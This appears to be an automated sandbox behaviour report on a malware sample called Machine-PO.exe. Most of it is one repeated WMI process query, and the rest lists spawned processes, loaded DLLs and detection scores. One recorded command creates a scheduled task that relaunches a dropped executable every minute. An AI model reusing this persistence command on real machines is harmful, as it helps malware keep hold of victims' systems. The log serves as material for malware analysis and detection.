                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_Machine-PO.exe'
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: Machine-PO.exeVirustotal: Detection: 85%
                              Source: Machine-PO.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\Machine-PO.exeFile read: C:\Users\user\Desktop\Machine-PO.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\Machine-PO.exe "C:\Users\user\Desktop\Machine-PO.exe"
                              Source: C:\Users\user\Desktop\Machine-PO.exeProcess created: C:\Users\user\Desktop\._cache_Machine-PO.exe "C:\Users\user\Desktop\._cache_Machine-PO.exe"
                              Source: C:\Users\user\Desktop\Machine-PO.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbs
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6892 -s 2996
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe "C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                              Source: C:\Users\user\Desktop\Machine-PO.exeProcess created: C:\Users\user\Desktop\._cache_Machine-PO.exe "C:\Users\user\Desktop\._cache_Machine-PO.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_Machine-PO.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\UAINOJ.vbsJump to behavior
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288Jump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn UAINOJ.exe /tr C:\Users\user\AppData\Roaming\Windata\TCPKPY.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\Machine-PO.exeSection loaded: shacct.dllJump to behavior
